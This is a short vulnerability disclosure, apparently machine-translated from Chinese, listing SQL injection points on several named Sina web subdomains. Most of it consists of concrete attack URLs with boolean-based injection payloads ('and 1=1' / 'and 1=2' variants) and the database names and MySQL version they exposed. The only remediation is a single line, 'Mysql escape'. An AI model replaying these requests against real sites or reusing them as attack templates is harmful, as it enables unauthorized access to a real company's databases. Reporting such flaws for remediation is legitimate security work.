Http://bj.bbs.house.sina.com.cn: 80/bbs/post/show? Pid = 5742081790378527840 'and '1' = '1
Http://bj.bbs.house.sina.com.cn: 80/bbs/post/show? Pid = 5742081790378527840 'and '1' = '2
Current DB: bbs_house_sina_com_cn
Http://wanwan.sina.com.cn/third_party/sss.sina.com.cn/page_moduel/hqad.php? Type = 2 'and '1' = '1
Http://wanwan.sina.com.cn/third_party/sss.sina.com.cn/page_moduel/hqad.php? Type = 2 'and '1' = '2
VERSION: MySQL 5.0.11
Current DB: ssgameu
Xinlang station injection _ No. 3
Http://data.auto.sina.com.cn/car/api/getCarInfo2motu.php? Subid = 573 and 1 = 2
Http://data.auto.sina.com.cn/car/api/getCarInfo2motu.php? Subid = 573 and 1 = 1
Current DB: dataauto
Xinlang station injection _ No. 4
Http://weidealer.auto.sina.com.cn/api/auto/difang/get_carpay_rec.php? Callback = jsonp1369149048230 & province = 23 & country = all & limit = 6 & t = jsonp & x = 0.19883825746364892 & city = 1 and 1 = 2
Http://weidealer.auto.sina.com.cn/api/auto/difang/get_carpay_rec.php? Callback = jsonp1369149048230 & province = 23 & country = all & limit = 6 & t = jsonp & x = 0.19883825746364892 & city = 1 and 1 = 1
Dbs: test, weidealer
Solution:
Mysql escape